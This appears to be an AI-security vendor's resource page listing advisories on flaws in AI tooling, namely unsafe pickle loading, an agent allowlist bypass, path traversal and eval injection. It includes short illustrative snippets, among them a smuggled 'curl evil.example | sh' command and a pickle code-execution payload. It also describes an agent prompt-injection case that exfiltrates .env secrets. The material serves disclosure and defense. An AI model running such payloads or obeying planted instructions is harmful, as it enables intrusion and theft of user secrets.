Innovation Hub

Featured Posts

Insights

Reflections on RSAC 2026: Moving Beyond Messaging and Sponsored Lists to Measurable AI Security

Insights

Securing AI Agents: The Questions That Actually Matter

Insights

The Hidden Risk of Agentic AI: What Happens Beyond the Prompt

Get all our Latest Research & Insights

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.

Research

Research

AI Agents in Production: Security Lessons from Recent Incidents

Research

LiteLLM Supply Chain Attack

Research

Exploring the Security Risks of AI Assistants like OpenClaw

Research

Agentic ShadowLogic

Videos

Reports and Guides

Report and Guide

2026 AI Threat Landscape Report

Register today to receive your copy of the report on March 18th and secure your seat for the accompanying webinar on April 8th.

Report and Guide

Securing AI: The Technology Playbook

A practical playbook for securing, governing, and scaling AI applications for Tech companies.

Report and Guide

Securing AI: The Financial Services Playbook

A practical playbook for securing, governing, and scaling AI systems in financial services.

HiddenLayer AI Security Research Advisory

CVE-2026-3071

Flair Vulnerability Report

An arbitrary code execution vulnerability exists in the LanguageModel class due to unsafe deserialization in the load_language_model method. Specifically, the method invokes torch.load() with the weights_only parameter set to False, which causes PyTorch to rely on Python’s pickle module for object deserialization.
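The risk class can be illustrated with Python’s pickle module alone, which torch.load() relies on when weights_only is False. A minimal sketch under stated assumptions (the payload class and the eval expression are illustrative, not taken from the advisory):

```python
import pickle

class MaliciousPayload:
    """Illustrative stand-in for an object embedded in a model file."""
    def __reduce__(self):
        # __reduce__ tells pickle how to rebuild the object; the callable
        # it returns runs during deserialization, before any caller code.
        return (eval, ("6 * 7",))

blob = pickle.dumps(MaliciousPayload())   # what an attacker ships as a "model"
result = pickle.loads(blob)               # deserializing runs eval("6 * 7")
print(result)  # 42 -- the attacker's expression already executed
```

Passing weights_only=True instead restricts deserialization to tensor data and primitive types, so arbitrary objects like this one are rejected rather than executed.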

CVE-2025-62354

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When in autorun mode, Cursor checks each command sent to run in the terminal against an allowlist of approved commands. A flaw in the logic of the checking function allows an attacker to craft a command that executes non-allowed commands.
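This class of bug generalizes beyond any one tool. A hypothetical sketch of a first-token allowlist check, showing how shell operators smuggle a second command past it (naive_is_allowed and the allowlist are invented for illustration, not Cursor’s actual code):

```python
ALLOWED_COMMANDS = {"ls", "echo", "git"}

def naive_is_allowed(command: str) -> bool:
    # Hypothetical check modeled on the vulnerable pattern: only the
    # first whitespace-separated token is compared to the allowlist.
    tokens = command.split()
    return bool(tokens) and tokens[0] in ALLOWED_COMMANDS

# The intended use passes:
print(naive_is_allowed("ls -la"))                          # True
# Shell operators smuggle a non-allowed command past the check:
print(naive_is_allowed("echo hi; curl evil.example | sh"))  # True -- bypass
print(naive_is_allowed("curl evil.example"))                # False
```

A robust check must reason about the full shell grammar (operators, substitutions, quoting), not just the leading token.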

CVE-2025-62353

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.
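A minimal sketch of the vulnerable pattern and one possible guard, assuming POSIX paths and a hypothetical project root (not Windsurf’s actual implementation):

```python
import os

PROJECT_ROOT = "/workspace/project"  # hypothetical project directory

def unsafe_resolve(user_path: str) -> str:
    # Vulnerable pattern: join without checking that the result stays
    # inside the project, so "../" segments escape it.
    return os.path.normpath(os.path.join(PROJECT_ROOT, user_path))

def safe_resolve(user_path: str) -> str:
    resolved = os.path.normpath(os.path.join(PROJECT_ROOT, user_path))
    if os.path.commonpath([resolved, PROJECT_ROOT]) != PROJECT_ROOT:
        raise ValueError("path escapes the project directory")
    return resolved

print(unsafe_resolve("../../etc/passwd"))  # /etc/passwd -- outside the project
```

Real implementations should also resolve symlinks (os.path.realpath) before the containment check, since a link inside the project can point outside it.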

SAI-ADV-2025-012

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

In the News

News
HiddenLayer Unveils New Agentic Runtime Security Capabilities for Securing Autonomous AI Execution

News
HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems

News
HiddenLayer’s Malcolm Harkins Inducted into the CSO Hall of Fame

Insights

Reflections on RSAC 2026: Moving Beyond Messaging and Sponsored Lists to Measurable AI Security

Insights

Securing AI Agents: The Questions That Actually Matter

Insights

The Hidden Risk of Agentic AI: What Happens Beyond the Prompt

Insights

Why Autonomous AI Is the Next Great Attack Surface

Insights

Model Intelligence: Bringing Transparency to Third-Party AI Models

Insights

Introducing Workflow-Aligned Modules in the HiddenLayer AI Security Platform

Modern AI environments don’t fail because of a single vulnerability. They fail when security can’t keep pace with how AI is actually built, deployed, and operated. That’s why our latest platform update represents more than a UI refresh. It’s a structural evolution of how AI security is delivered.

Insights

Inside HiddenLayer’s Research Team: The Experts Securing the Future of AI

Every new AI model expands what’s possible and what’s vulnerable. Protecting these systems requires more than traditional cybersecurity. It demands expertise in how AI itself can be manipulated, misled, or attacked. Adversarial manipulation, data poisoning, and model theft represent new attack surfaces that traditional cybersecurity isn’t equipped to defend.

Insights

Why Traditional Cybersecurity Won’t “Fix” AI

When an AI system misbehaves, from leaking sensitive data to producing manipulated outputs, the instinct across the industry is to reach for familiar tools: patch the issue, run another red team, test more edge cases.

Insights

Securing AI Through Patented Innovation

As AI systems power critical decisions and customer experiences, the risks they introduce must be addressed. From prompt injection attacks to adversarial manipulation and supply chain threats, AI applications face vulnerabilities that traditional cybersecurity can’t defend against. HiddenLayer was built to solve this problem, and today, we hold one of the world’s strongest intellectual property portfolios in AI security.

Insights

AI Discovery in Development Environments

AI is reshaping how organizations build and deliver software. From customer-facing applications to internal agents that automate workflows, AI is being woven into the code we develop and deploy in the cloud. But as the pace of adoption accelerates, most organizations lack visibility into what exactly is inside the AI systems they are building.

Insights

Integrating AI Security into the SDLC

AI and ML systems are expanding the software attack surface in new and evolving ways, through model theft, adversarial evasion, prompt injection, data poisoning, and unsafe model artifacts. These risks can’t be fully addressed by traditional application security alone. They require AI-specific defenses integrated directly into the Software Development Lifecycle (SDLC).

Insights

Top 5 AI Threat Vectors in 2025

AI is powering the next generation of innovation. Whether driving automation, enhancing customer experiences, or enabling real-time decision-making, it has become inseparable from core business operations. However, as the value of AI systems grows, so does the incentive to exploit them.

Webinars

Offensive and Defensive Security for Agentic AI

Webinars

How to Build Secure Agents

Webinars

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

Webinars

HiddenLayer Webinar: 2024 AI Threat Landscape Report

Webinars

HiddenLayer Model Scanner

Webinars

HiddenLayer Webinar: A Guide to AI Red Teaming

Webinars

HiddenLayer Webinar: Accelerating Your Customer's AI Adoption

Webinars

HiddenLayer: AI Detection Response for GenAI

Webinars

HiddenLayer Webinar: Women Leading Cyber

Report and Guide

2026 AI Threat Landscape Report

Report and Guide

Securing AI: The Technology Playbook

Report and Guide

Securing AI: The Financial Services Playbook

Report and Guide

AI Threat Landscape Report 2025

Report and Guide

HiddenLayer Named a Cool Vendor in AI Security

Report and Guide

A Step-By-Step Guide for CISOs

Report and Guide

AI Threat Landscape Report 2024

Report and Guide

HiddenLayer and Intel eBook

Report and Guide

Forrester Opportunity Snapshot

Report and Guide

Gartner® Report: 3 Steps to Operationalize an Agentic AI Code of Conduct for Healthcare CIOs

News

HiddenLayer Unveils New Agentic Runtime Security Capabilities for Securing Autonomous AI Execution

News

HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems

News

HiddenLayer’s Malcolm Harkins Inducted into the CSO Hall of Fame

News

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

News

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

News

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

News

HiddenLayer Appoints Chelsea Strong as Chief Revenue Officer to Accelerate Global Growth and Customer Expansion

News

HiddenLayer Listed in AWS “ICMP” for the US Federal Government

News

New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes

News

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

News

All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

News

One Prompt Can Bypass Every Major LLM’s Safeguards

SAI Security Advisory

Unsafe Deserialization in DeepSpeed utility function when loading the model file

If a user attempts to convert distributed checkpoints into a single consolidated file using DeepSpeed, a PyTorch file following the naming convention *_optim_states.pt is loaded. Deserializing this file returns a state that specifies the model state file, also located in the directory. That model state file can contain a maliciously crafted data.pkl file which, when deserialized as part of this process, may lead to arbitrary code execution on the system.

SAI Security Advisory

keras.models.load_model when scanning .pb files leads to arbitrary code execution

If a user scans a malicious Keras model in the protobuf format with Bosch AI Shield’s Watchtower vulnerability scanning tool, the code embedded in the model will run, executing arbitrary code on the scanning system.

SAI Security Advisory

keras.models.load_model when scanning .h5 files leads to arbitrary code execution

If a user scans a malicious Keras model in the H5 format with Bosch AI Shield’s Watchtower vulnerability scanning tool, the code embedded in the model will run, executing arbitrary code on the scanning system.

SAI Security Advisory

Unsafe extraction of NeMo archive leading to arbitrary file write

An attacker can craft a malicious model containing a path traversal and share it with a victim. If the victim uses an Nvidia NeMo version prior to r2.0.0rc0 and loads the malicious model, arbitrary files may be written to disk. This can result in code execution and data tampering.
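Archive-extraction traversal of this kind reduces to validating member paths before extraction. A minimal sketch of such a check using tar archives (is_safe_member is an illustrative helper, not NeMo’s actual patch):

```python
import tarfile

def is_safe_member(member: tarfile.TarInfo) -> bool:
    # Reject absolute paths and any ".." segment -- the two ways an
    # archive member can land outside the extraction directory.
    parts = member.name.split("/")
    return not member.name.startswith("/") and ".." not in parts

print(is_safe_member(tarfile.TarInfo("model_weights.ckpt")))       # safe
print(is_safe_member(tarfile.TarInfo("../../home/victim/.bashrc")))  # traversal
```

On Python 3.12+, tarfile’s extraction filters (e.g. extractall(..., filter="data")) enforce a stricter version of the same idea.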

SAI Security Advisory

Eval on XML parameters allows arbitrary code execution when loading RAIL file

An attacker can craft an XML file with Python code contained within a ‘validators’ attribute. This code must be wrapped in braces to work, i.e. `{Python_code}`. This can then be passed to a victim user as a Guardrails file, and upon loading it, the Python code contained within the braces is passed into an eval function, which will execute the Python code contained within.
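The pattern is easy to reproduce in isolation. A hypothetical sketch (load_validator_value is invented for illustration; the real Guardrails parsing is more involved):

```python
def load_validator_value(attr: str):
    # Hypothetical sketch of the vulnerable pattern: any attribute
    # value wrapped in braces is handed directly to eval().
    if attr.startswith("{") and attr.endswith("}"):
        return eval(attr[1:-1])  # attacker-controlled code runs here
    return attr

print(load_validator_value("plain-value"))  # returned as-is
print(load_validator_value("{6 * 7}"))      # 42 -- the expression executed
```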

SAI Security Advisory

Web UI renders JavaScript code in ML Engine name leading to XSS

An attacker authenticated to a MindsDB instance can create an ML Engine, database, project, or upload a dataset within the UI and give it a name (or value in the dataset) containing JavaScript code that will render when the items are enumerated within the UI.

SAI Security Advisory

Pickle Load on inhouse BYOM model finetune leads to arbitrary code execution

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘finetune’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse.’

SAI Security Advisory

Pickle Load on inhouse BYOM model describe query leads to arbitrary code execution

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘describe’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse.’

SAI Security Advisory

Pickle Load on inhouse BYOM model prediction leads to arbitrary code execution

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘predict’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse’.

SAI Security Advisory

Pickle Load on BYOM model load leads to arbitrary code execution

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via a ‘predict’ or ‘describe’ query, executing the arbitrary code on the server.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in SharePoint integration list item creation

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a list item, where the value given for the ‘fields’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in SharePoint integration site column creation

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a site column, where the value given for the ‘text’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.
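For parsing Python data types from untrusted strings, ast.literal_eval is the standard safe alternative to eval. A minimal contrast (function names invented for illustration):

```python
import ast

def parse_param_unsafe(value: str):
    # Vulnerable pattern: eval() parses literals but also runs
    # arbitrary expressions, including function calls.
    return eval(value)

def parse_param_safe(value: str):
    # ast.literal_eval accepts only Python literals (strings, numbers,
    # tuples, lists, dicts, sets, booleans, None) and rejects calls.
    return ast.literal_eval(value)

print(parse_param_unsafe("__import__('os').getcwd()"))  # runs code as a side effect
print(parse_param_safe("['Title', 42]"))                # parses data only
```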

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.

